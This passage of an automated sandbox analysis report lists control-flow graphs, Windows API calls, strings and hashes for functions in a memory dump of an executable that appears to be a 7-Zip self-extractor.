                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: DiskFreeMessageSendSpace
                                              • String ID:
                                              • API String ID: 696007252-0
                                              • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                              • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                              • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                              • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                              • String ID: HpA
                                              • API String ID: 801014965-2938899866
                                              • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                              • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                              • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                              • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                              • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                              • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                              • DispatchMessageW.USER32(?), ref: 00401B89
                                              • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                              • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                              • String ID: Static
                                              • API String ID: 2479445380-2272013587
                                              • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                              • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                              • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                              • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@memcpymemmove
                                              • String ID:
                                              • API String ID: 3549172513-3916222277
                                              • Opcode ID: 8d89568e7704e25c3decf5065bc3033c009c8e5cfc7e61473a81ed2ccd4f7586
                                              • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                              • Opcode Fuzzy Hash: 8d89568e7704e25c3decf5065bc3033c009c8e5cfc7e61473a81ed2ccd4f7586
                                              • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 862->860 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
                                              APIs
                                              • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                              • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040349D
                                                • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT ref: 0040114B
                                                • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT ref: 00401171
                                              • memcpy.MSVCRT ref: 0040342F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040346C
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004034B2
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                              • String ID:
                                              • API String ID: 846840743-0
                                              • Opcode ID: 2b46add0d83989d6d2bf919775794c273d74a5e0ae406f9f13f2ee8c83144718
                                              • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                              • Opcode Fuzzy Hash: 2b46add0d83989d6d2bf919775794c273d74a5e0ae406f9f13f2ee8c83144718
                                              • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT ref: 00402032
                                                • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT ref: 00402071
                                                • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT ref: 004020E7
                                                • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT ref: 0040208F
                                                • Part of subcall function 00401F9D: _wtol.MSVCRT(?), ref: 0040212A
                                                • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                              • wsprintfW.USER32 ref: 004044A7
                                                • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT ref: 00402F71
                                              • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                              • String ID: 7zSfxFolder%02d$IA
                                              • API String ID: 3387708999-1317665167
                                              • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                              • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                              • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                              • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 924 408f26 923->924 925 408f19-408f24 923->925 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 924->927 925->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 945 409199-4091b0 935->945 946 409019-40901c 935->946 939 409020-409035 call 40e8da call 40874d 936->939 966 408fb0-408fb2 937->966 967 408fb6-408fbb 937->967 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 945->952 953 40934c-409367 call 4087ea 945->953 946->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 968 4090ad-4090b3 955->968 969 40907f 955->969 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 964 409051-409061 call 408726 958->964 959->964 988 409063-409066 964->988 989 409068 964->989 966->967 970 408fc3-408fcf 967->970 971 408fbd-408fbf 967->971 981 409187-409196 call 408e83 968->981 982 4090b9-4090d9 call 40d94b 968->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 969->977 970->922 970->923 971->970 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->968 1016 409261-409264 978->1016 1017 4092c9 978->1017 986 4091f7-409209 979->986 987 4092b9-4092bb 979->987 981->945 993 4090de-4090e6 982->993 1002 4093a4-4093b8 call 408761 983->1002 1003 4093ba-4093d6 983->1003 1014 409293-409295 986->1014 1015 40920f-409211 986->1015 1004 4092bf-4092c4 987->1004 996 40906a 988->996 989->996 1000 409283-409288 993->1000 1001 4090ec-4090f3 993->1001 996->955 1012 409290 1000->1012 1013 40928a-40928c 1000->1013 1008 409121-409124 1001->1008 1009 4090f5-4090f9 1001->1009 1002->1003 1080 4093d7 call 40ce70 1003->1080 1081 4093d7 call 40f160 1003->1081 1004->977 1022 4092b2-4092b7 1008->1022 1023 40912a-409138 call 408726 1008->1023 1009->1008 1018 4090fb-4090fe 1009->1018 1012->1014 1013->1012 1025 409297-409299 1014->1025 1026 40929d-4092a0 1014->1026 1015->978 1024 409213-409215 1015->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->987 1022->1004 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1050 409281 1027->1050 1028->1046 1051 409114-40911f call 40d6cb 1028->1051 1029->1004 1034 4092ac-4092ae 1029->1034 1037 4092d4-4092e0 call 408a55 1030->1037 1038 40931d-409346 call 40e959 * 2 1030->1038 1034->1022 1057 4092e2-4092ec 1037->1057 1058 4092ee-4092fa call 408aa0 1037->1058 1038->953 1038->957 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1050->1030 1051->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1066 409165-409167 1060->1066 1067 40916b-409170 1060->1067 1063->1037 1063->1038 1066->1067 1071 409172-409174 1067->1071 1072 409178-409181 1067->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID: IA$IA
                                              • API String ID: 1033339047-1400641299
                                              • Opcode ID: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                              • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                              • Opcode Fuzzy Hash: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                              • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                              APIs
                                              • free.MSVCRT(?,?,?,?,00417680), ref: 00410D0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: $KA$4KA$HKA$\KA
                                              • API String ID: 1294909896-3316857779
                                              • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                              • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                              • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                              • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1121 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1121 1122 40983c-409846 call 409425 1112->1122 1113->1114 1115 409780-409796 call 4094e0 call 40969d call 40e959 1114->1115 1116 4097a3-4097a8 1114->1116 1137 40979b-4097a1 1115->1137 1119 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1116->1119 1120 4097aa-4097b4 1116->1120 1125 4097f3-409809 1119->1125 1120->1119 1120->1125 1133 409881-40989a call 4010e2 call 40eb24 1121->1133 1134 409878-40987f call 40ebf7 1121->1134 1144 40984a-40984c 1122->1144 1130 40980c-409814 1125->1130 1136 409816-409825 call 409403 1130->1136 1130->1137 1154 40989d-4098c0 call 40eb19 1133->1154 1134->1133 1136->1130 1137->1109 1144->1110 1157 4098c2-4098c7 1154->1157 1158 4098f6-4098f9 1154->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1164 409954 1159->1164 1165 40994b-409952 call 409c13 1159->1165 1166 409902-409904 1160->1166 1167 409908-40991e call 409530 call 409425 1160->1167 1161->1162 1180 4098e9-4098eb 1162->1180 1181 4098ef-4098f1 1162->1181 1170 409956-40996d call 4010e2 1164->1170 1165->1170 1166->1167 1167->1159 1182 40997b-4099a0 call 409fb4 1170->1182 1183 40996f-409978 1170->1183 1180->1181 1181->1110 1186 4099a2-4099a7 1182->1186 1187 4099e3-4099e6 1182->1187 1183->1182 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1154 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1226 409aa2-409aa4 1213->1226 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1223 409a73-409a75 1218->1223 1224 409a79-409a91 call 409530 call 409425 1218->1224 1219->1213 1220->1195 1221 409adf-409ae5 1220->1221 1221->1195 1223->1224 1224->1144 1233 409a97-409a9d 1224->1233 1229 409aa6-409aa8 1226->1229 1230 409aac-409ab0 1226->1230 1229->1230 1230->1195 1233->1144
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004096D0
                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040986E
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00409941
                                                • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT ref: 00409C3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@$H_prolog
                                              • String ID: HIA
                                              • API String ID: 3431946709-2712174624
                                              • Opcode ID: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                              • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                              • Opcode Fuzzy Hash: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                              • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: lstrlenmemcmp$memmove
                                              • String ID:
                                              • API String ID: 3251180759-0
                                              • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                              • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                              • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
